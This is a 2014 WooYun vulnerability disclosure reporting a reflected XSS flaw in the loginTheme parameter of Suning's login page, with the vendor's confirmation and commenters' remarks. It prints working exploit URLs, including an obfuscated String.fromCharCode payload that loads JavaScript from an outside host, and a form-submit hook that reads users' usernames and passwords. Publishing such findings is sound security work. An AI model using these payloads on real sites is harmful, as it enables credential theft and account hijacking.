当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053383

漏洞标题:苏宁易购某分站XSS漏洞可用于获取账号密码(xss劫持表单技巧)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: 龟兔赛跑

提交时间:2014-03-11 23:11

修复时间:2014-04-25 23:12

公开时间:2014-04-25 23:12

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-11: 细节已通知厂商并且等待厂商处理中
2014-03-12: 厂商已经确认,细节仅向厂商公开
2014-03-22: 细节向核心白帽子及相关领域专家公开
2014-04-01: 细节向普通白帽子公开
2014-04-11: 细节向实习白帽子公开
2014-04-25: 细节向公众公开

简要描述:

苏宁易购某分站反射型XSS漏洞可用于获取账号密码

详细说明:

苏宁易购登录页面存在反射型XSS漏洞,具体URL为:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c
虽然对loginTheme进行了一定的过滤,但是还是允许<a> <img>等html tag.
最简单的测试为:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Cimg%20src=%22test
可以看到会员登录框上出现一个image:

suning2.png


接下来就是如何构建注入代码加载JS文件,以及如何bypass浏览器的xss filter, 目前只是在FireFox上实现了加载JS,IE和chrome上还没有加载成功,相信各位大牛一定能找到方法。
加载的js的代码为:

$("form").submit(function( event ) {
	  alert($("input[name='username']").val() + '=' + $("input[name='password']").val());
});


FireFox上访问的URL构建为(javascript:eval + String.fromCharCode):
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Ca%20href%3D%22javascript%3Aeval%28String.fromCharCode%2895,108,111,97,100,74,115,40,34,104,116,116,112,115,58,47,47,111,119,97,102,112,101,46,115,105,110,97,97,112,112,46,99,111,109,47,115,116,97,116,105,99,47,116,101,115,116,46,106,115,34,41%29%29;%22%20id=%22a
这里是注入<a>, 用户点击输入输入框时会加载js,提交的时候就能拿到username和password了。
如何利用就不用我讲了吧。

漏洞证明:

suning.png

修复方案:

过滤loginTheme参数

版权声明:转载请注明来源 龟兔赛跑@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-12 09:00

厂商回复:

感谢您对苏宁易购安全的关注,先确定,再安排修复,谢谢。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-12 00:04 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    雅咩爹

  2. 2014-03-12 00:16 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    雅咩爹

  3. 2014-03-12 14:02 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    一袋一袋哟~

  4. 2014-05-09 16:41 | bitcoin ( 普通白帽子 | Rank:715 漏洞数:218 | 学习是最好的投资!)

    牛!

  5. 2014-10-27 10:43 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。我擦,一个反射型也能有15分?

  6. 2014-10-28 17:49 | quanxian ( 实习白帽子 | Rank:32 漏洞数:2 | This is QuanXian.)

    @px1624 关键是位置好

  7. 2014-10-28 17:56 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @quanxian 位置怎么好了?这效果随便一个反射型都可以实现的